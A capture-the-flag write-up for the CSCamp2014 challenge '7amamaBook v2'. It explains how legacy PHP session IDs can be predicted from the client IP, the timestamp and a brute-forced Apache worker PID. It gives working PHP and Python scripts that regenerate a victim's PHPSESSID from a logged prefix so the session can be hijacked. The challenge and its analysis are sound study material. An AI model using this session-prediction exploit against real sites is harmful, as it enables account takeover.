
[CSCamp2014 CTF finals] 7amamabook v2 solution

1 December 2014

Challenge name: 7amamaBook v2
Source code: https://github.com/0xAli/CTF-Challenges/tree/master/7amamabook%20v2

*SPOILERS BELOW*

Vulnerability: known weak PRNG in PHP's legacy session ID generation.
The session ID is the MD5 of a buffer made of the client IP, the request time in seconds and microseconds, and one output of php_combined_lcg(), whose state is seeded from that same timestamp and the PID of the Apache worker. If you know the IP, the seconds and the microseconds, the PID is the only unknown left, and it is small enough to brute-force, so you can calculate the session ID. (Outside a CTF this only works when no extra entropy is mixed in: session.entropy_file is empty by default up to PHP 5.3, defaults to /dev/urandom from 5.4, and PHP 7.1 replaced this scheme altogether.)

Challenge solution:
First brute-force directory names to find the "logs" directory (dirbuster should find it quickly).
Open sessions.txt.
Find the IP, seconds, microseconds and the partial session ID (the partial ID is used to verify the result of the programmatic brute force).
Write a brute-force script that guesses the Apache worker's process ID and regenerates the session ID for each candidate.
Then use Cookie Manager+ or any other tool to set the PHPSESSID cookie to the session ID you got.
Then browse to the index (or click 7amamberg in the FAQ) to see the key.

<?php
// Mirrors php_combined_lcg() from ext/standard/lcg.c, seeded the way the
// challenge seeds it: s1 = seconds ^ ~microseconds, s2 = process ID.
// The seed is passed in instead of being read with gettimeofday(), so the
// same values can be replayed for every PID candidate.
function our_php_combined_lcg($sec,$usec,$pid) {
    $lcg['s1'] = $sec ^ (~$usec);
    $lcg['s2'] = $pid;

    // MODMULT(53668, 40014, 12211, 2147483563, s1)
    $q = (int) ($lcg['s1'] / 53668);
    $lcg['s1'] = (int) (40014 * ($lcg['s1'] - 53668 * $q) - 12211 * $q);
    if ($lcg['s1'] < 0)
        $lcg['s1'] += 2147483563;

    // MODMULT(52774, 40692, 3791, 2147483399, s2)
    $q = (int) ($lcg['s2'] / 52774);
    $lcg['s2'] = (int) (40692 * ($lcg['s2'] - 52774 * $q) - 3791 * $q);
    if ($lcg['s2'] < 0)
        $lcg['s2'] += 2147483399;

    $z = (int) ($lcg['s1'] - $lcg['s2']);
    if ($z < 1) {
        $z += 2147483562;
    }

    return $z * 4.656613e-10;
}

// Values read from logs/sessions.txt
$ip  = '127.0.0.1';
$sec = 1417089230;
$usec= 458131;

// Brute-force the worker PID. 10000 was enough here; the Linux default pid_max
// is 32768, so raise the bound if nothing matches. The buffer layout and the MD5
// are those of session.c; the first 10 hex characters are compared with the
// partial session ID taken from the log, and the full ID is printed on a hit.
for($i=0;$i < 10000;$i++){
    $buf = sprintf("%.15s%ld%ld%0.8f", $ip,$sec , $usec, our_php_combined_lcg($sec, $usec,$i) * 10);
    if(substr(md5($buf),0,10) == '26b331444d') exit(md5($buf));
}
?>
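The same attack end to end in Python, as an added example that is not part of the original write-up or the challenge repository. It builds the victim's session ID itself (same IP and timestamp as above, but the PID 4242 is chosen here, not taken from the challenge), takes only the first 10 hex characters as the "logged" prefix, and recovers the PID and the full ID by brute force. The seeding formula follows the challenge's generator; the two details that matter when porting the C/PHP arithmetic are that the LCG state is a signed 32-bit int and that C's division truncates toward zero while Python's // floors.

```python
"""Predicting a legacy PHP session ID (the scheme 7amamaBook v2 reproduces).

Added example, not the write-up's or the challenge's own code. The victim
request (IP, timestamp, PID 4242) is constructed here so the script runs
offline; in the CTF the IP, seconds, microseconds and ID prefix come from
logs/sessions.txt.
"""
import hashlib

M1, M2 = 2147483563, 2147483399   # moduli of the two LCGs in php_combined_lcg()


def int32(x):
    """Wrap to a signed 32-bit int: PHP keeps the LCG state in php_int32."""
    x &= 0xFFFFFFFF
    return x - 0x100000000 if x & 0x80000000 else x


def c_div(n, d):
    """Integer division truncating toward zero, as C does (Python's // floors)."""
    q = abs(n) // abs(d)
    return q if (n < 0) == (d < 0) else -q


def combined_lcg(sec, usec, pid):
    """php_combined_lcg() on a freshly seeded generator.

    Seeding follows the challenge: s1 = sec ^ ~usec, s2 = pid. (PHP 5.3.2's
    "improved LCG entropy" change also XORs a second usec reading into s2;
    the challenge's generator does not.)
    """
    s1 = int32(sec ^ ~usec)
    s2 = int32(pid)

    q = c_div(s1, 53668)                    # MODMULT(53668, 40014, 12211, M1, s1)
    s1 = 40014 * (s1 - 53668 * q) - 12211 * q
    if s1 < 0:
        s1 += M1

    q = c_div(s2, 52774)                    # MODMULT(52774, 40692, 3791, M2, s2)
    s2 = 40692 * (s2 - 52774 * q) - 3791 * q
    if s2 < 0:
        s2 += M2

    z = s1 - s2
    if z < 1:
        z += 2147483562
    return z * 4.656613e-10


def session_id(ip, sec, usec, pid):
    """Hash the buffer session.c built: "%.15s%ld%ld%0.8F", MD5, 4 bits/char."""
    buf = "%.15s%d%d%0.8f" % (ip, sec, usec, combined_lcg(sec, usec, pid) * 10)
    return hashlib.md5(buf.encode("ascii")).hexdigest()


def recover_session_id(ip, sec, usec, known_prefix, pid_max=32768):
    """Brute-force the worker PID; 32768 is the classic Linux pid_max.

    Returns (pid, full_session_id) for the first candidate whose ID starts
    with the prefix read from the log, or None if no PID in range matches.
    """
    for pid in range(pid_max):
        sid = session_id(ip, sec, usec, pid)
        if sid.startswith(known_prefix):
            return pid, sid
    return None


# Constructed victim: the write-up's IP and timestamp, a PID chosen by us.
VICTIM_IP, VICTIM_SEC, VICTIM_USEC, VICTIM_PID = "127.0.0.1", 1417089230, 458131, 4242
VICTIM_SID = session_id(VICTIM_IP, VICTIM_SEC, VICTIM_USEC, VICTIM_PID)
LOGGED_PREFIX = VICTIM_SID[:10]   # the partial ID an attacker reads from sessions.txt

if __name__ == "__main__":
    hit = recover_session_id(VICTIM_IP, VICTIM_SEC, VICTIM_USEC, LOGGED_PREFIX)
    print("prefix %s -> pid %d, PHPSESSID=%s" % (LOGGED_PREFIX, hit[0], hit[1]))
```

A 10-character prefix is 40 bits, so a false match among a few tens of thousands of PID candidates is not a practical concern, but if the log only gives a shorter prefix, keep all matches and try each PHPSESSID in turn.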

Sources:
http://php.net/manual/en/function.session-regenerate-id.php
https://github.com/php/php-src/blob/master/ext/session/session.c#L310
